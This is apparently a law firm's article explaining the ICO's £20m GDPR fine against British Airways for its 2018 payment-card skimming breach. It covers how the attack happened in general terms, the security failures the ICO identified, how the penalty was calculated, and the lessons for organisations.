The UK Information Commissioner’s Office (ICO) have announced a £20 million fine for British Airways (BA) in relation to a data breach.  This is the first fine issued by the Information Commissioner’s Office (ICO) under the EU General Data Protection Regulation (GDPR).  It’s a hefty sum, but significantly lower than the £183.39m fine that the ICO declared an intention to impose on BA back 4 July 2019 (which we wrote about here).

So, what is the fine for, how was it calculated and how come the ICO appears to have softened its approach so significantly?

Waterfront Associate, Jessica Vautier, and Partner, Alison Beryman, have carefully pored over the ICO’s announcement of the fine and all 114 pages of the penalty notice to see whether there are any lessons that the rest of us can take away from this unfortunate set of circumstances…

What personal data was disclosed?

Between 22 June and 5 September 2018, a cyber attacker (or attackers) gained access to details of approximately 108,000 payment cards on the BA internal system, then editing a file on the BA website, enabling cardholder data input into the BA website to be accessed by a website controller by the attacker. As a result, the attacker is believed to have potentially accessed approximately 429,612 individuals’ personal data, including:
•    Name, address, card number and CVV number of BA customers – 244,000 data subjects
•    Card number and CVV only – 77,000 data subjects
•    Card number only – 108,000 data subjects
•    Usernames and passwords of BA employee and administrator accounts
•    Usernames and pin numbers of up to 612 BA Executive Club accounts

How did this happen?

The attacker(s) gained access to an internal British Airways application using compromised login credentials for a Citrix remote access gateway.  The compromised login credentials belonged to an employee of Swissport, a third party cargo services provider used by BA.

How the attacker was able to “break out” of the Citrix environment, thus gaining access to parts of BA’s network usually unavailable to Swissport employees, is not clear – this information has been redacted from the penalty notice (presumably so as not to provide details to other on how to compromise similar systems).  However, we know that the attacker obtained access to a file in which the username and password of a privileged domain administrator account were saved in plain text. This gave them almost unlimited access to BA’s systems.

On 26 July 2018, the attacker accessed files in plaintext containing payment card details for BA redemption transactions. Due to human error, these details were stored unencrypted, and had been logged in this way since December 2015. There was a 95-day retention period, so the only logs available were for the preceding 95 days. However, this still included the details of approximately 108,000 payment cards.

Between 14 August and 25 August 2018, the attacker inserted malicious code on BA’s website meaning that when customers entered their payment card information on www.britishairways.com, a copy of this was sent to the attacker’s website (a process known as “skimming”).

BA became aware of the breach on 5 September 2018, when a third party informed them that data was being sent from their website to a third party site. Within 90 minutes, BA had changed the malicious code, and 20 minutes later had blocked the URL paths to the attacker’s site. They notified the ICO the following day (6 September), as well as 496,636 affected customers, plus an additional 39,480 affected customers the day after (7 September).

What legal obligations were breached?

The ICO assessed that BA had failed to comply with its obligations under Article 5(1)(f) and Article 32 of the GDPR.

Article 5(1)(f) sets out the principle that personal data shall be processed in a manner which ensures appropriate security of the personal data.

Article 32 concerns the security of processing personal data and requires data controllers to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk.

Could BA have done anything to prevent the attack?

The ICO has identified numerous measures which BA could have used to mitigate or prevent the risk of an attacker accessing their network.

These include:
•    Limiting users’ access to applications, data and tools to only those required for their role
•    Undertaking rigorous testing on the business’ systems, by simulating a cyber attack
•    Protecting employee and third party accounts with multi-factor authentication
•    Not “hardcoding”, i.e. recording passwords in unencrypted plain text files
•    Manual code reviews
•    Using file integrity monitoring software

The ICO believes that these security measures would not have been significantly costly for BA to implement, but has confirmed that considerable improvements have been made to BA’s IT security since the attack.

How did the ICO decide on the level of the penalty?

The penalty notice sets out the ICO’s considerations in relation to the penalty figure in extensive detail.  I have set out a very brief summary of some of the major points below, which include the nature, gravity and duration of the failure in determining the appropriate penalty (Article 83(2)(a) GDPR).

  • The ICO considers the nature and gravity of the failures to be of serious concern due to the amount of personal data that was being processed in an insecure manner (which led to such a large number of individuals being affected); the failure to put in place measures which could have been implemented to prevent the breach; and the fact that BA did not detect the breach themselves.
  • Although the personal data affected was not “special category data”, the data was nevertheless sensitive – for example, the disclosure of full credit card details including CVV numbers put data subjects at heightened risk.
  • In respect of the duration, the ICO took the commencement date of the GDPR (25 May 2018) as the start date and the 5 September 2018 as the date on which the breach was discovered and effectively stopped.  (This was different from the previous assessment, in which the breach was considered to have been resolved on 16 November 2018 – the date when all new security measures were put in place by BA to close the security weaknesses that had been exploited.)
  • The ICO recognised that the breach was not a deliberate breach by BA, but did find that they were negligent (Article 83(2)(b) GDPR).
  • As the data controller, the ICO considered that BA was wholly responsible for the breaches of the GDPR, although it was acknowledged that they were not exclusively responsible for the attack itself.
  • The ICO took into account the mitigating action taken by BA in response to the attack, that BA had no relevant previous infringements, had promptly notified the ICO of the breach, and had cooperated fully with their investigation.

Based on the above, it was determined by the ICO that in principle a penalty of £30m would be appropriate.

This was adjusted to £24m on the basis that:

•    BA had taken immediate measures to mitigate and minimise damage suffered by data subjects
•    BA promptly informed data subjects, law enforcement and regulatory agencies, and cooperated with the ICO’s enquiries
•    Widespread media reporting of the attack is likely to have increased awareness of the risks
•    The attack and subsequent regulatory action had adversely affected BA’s brand and reputation

This amount was further reduced to £20m having regard to the impact of the Covid-19 pandemic (on BA and more generally), in line with the ICO’s published regulatory approach in response to the coronavirus pandemic.

Why was the fine £20m rather than the previously announced £183.39m?

A clear explanation of how the final calculation could be so different from the earlier proposed calculation has not been provided, but the factors below seem likely to have had a bearing on the decision.

The ICO came to the £183.39m figure, published in July 2019, in reliance upon the Draft Internal Procedure for Setting and Issuing Monetary Penalties – this had been developed by the ICO to assist in making penalty figure decisions, using the controller’s turnover as the starting point.  However, having considered BA’s representations, the ICO was persuaded that this procedure was not, in fact, an appropriate mechanism to calculate the level of monetary penalty.

Following the ICO’s notice of intention to issue the £183.39 million fine, BA also provided significant additional information to the ICO.  These appear to have clarified some points of fact, as well as points of law, which affected the ICO’s decision as to the level of the penalty – although it is not entirely clear from the penalty notice what these clarifications were (partly, perhaps, because some facts have necessarily been redacted).

The ICO was required to discuss the level of the fine with the supervisory authorities in other jurisdictions in which impacted data subjects are resident.  The ICO does not disclose to what extent the level of the penalty was adjusted as a result of these discussions (if at all), but given the significance of the reduction, and the fact that no other country’s supervisory authority has so far been reported to have awarded a penalty in excess of £50 million, it seems likely that these discussions had at least some impact.

What should organisations learn from the ICO’s approach in this case?

The list above of the various measures that the ICO expected BA to have taken, and which would likely have prevented or limited the attack, should serve as a helpful reminder to businesses.  So very frequently attacks originate with the compromise of one or more individuals’ login credentials and it is of vital importance that businesses put in place appropriate technical and organisational measures to restrict any further breach using this stolen information.

It is also useful to consider the mitigating factors listed above, which contributed to a 20% reduction in BA’s fine – in particular the swift action taken to protect data subjects, which all organisations should be ready to take if such a breach ever occurs.

Above all, however, this decision should serve as a warning to all organisations.  Although much less than the sum originally proposed, £20 million is not inconsiderable and fines could be larger still if/when:

•    the ICO reverts to the mechanisms of calculation under the Draft Internal Procedure (particularly for organisations with high turnovers);
•    Brexit means that the ICO is no longer required to consult with overseas supervisory authorities; and
•    the considerations of the effect of Covid are no longer deemed applicable.